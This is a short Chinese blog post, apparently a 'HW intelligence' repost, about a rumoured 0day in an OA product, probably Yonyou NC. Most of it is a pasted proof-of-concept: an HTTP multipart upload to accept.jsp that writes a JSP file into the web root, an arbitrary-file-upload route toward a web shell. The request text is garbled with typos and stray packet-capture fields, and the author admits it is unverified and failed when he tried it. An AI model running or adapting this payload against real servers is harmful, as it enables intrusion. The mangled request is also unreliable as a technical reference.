【护网情报】疑似某OA 0day曝光
2022-7-27 03:9:33 Author: 安全透视镜(查看原文) 阅读量:913 收藏

声明

以下内容并未证实,是否存在漏洞未可知。若漏洞真实存在,请遵守网络安全法,切勿用作违法用途,一切后果均与本人无关

无意中看到一个POC


payload=POST/aim/equipmap/accept.jspHTTP/1.1User-Aaent:Mozilla/5.0 (Windows NT 10.0:Win64:x64) AppleWebKit/53736(KHTMLike Gecko)Chrome/890.4389.90 Safari/537.36Content-Length:436 Accept: text/html Connection: closeContent-Type:multipart/form-data;boundary=---------------------------16314487820932200903769468567 Accept-Encoding:gzip---------------16314487820932200903769468567Content-Disposition:form-data; name="upload;filename="222222.txt Content-Type:text/plain<% out.println("bea86d66a5278f9e6fa1112d2e2fcebf"); %>------------------16314487820932200903769468567Content-Disposition:form-data;name="fnameIwebapps\nc web\180900fd668c51631353aca37fc1f829.jsp------------16314487820932200903769468567--;tcp.flags=24;tcp.flags.syn=0;tcp.flags.ack=1;tcp.flags.reset=0;tcp.flags.fin=0;tcp.flags.push=1tcp.flags.urg=0;tcp.seq=2292457002;tcp.nxtseq=956110407;tcp.window size=229

看这个请求链接查了一下,应该是 用有NC的,然后就在fofa上搜了一下。该OA系统确实存在accept.jsp文件,但是访问报错。

于是就用burp构造了一个请求包,但还是报错,不过这次报错的内容不太一样。或许POC有问题,也有可能没有这个漏洞。没有源码,也懒得去验证,睡觉保命要紧。


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247490221&idx=1&sn=160168665253559f8bae955d25ec52ce&chksm=974fbd95a03834833f5e7ecb3ffd8d63acc4bd361d3e18f38fd5c2ed7a5d73ba31f39b5ca5a7#rd
如有侵权请联系:admin#unsafe.sh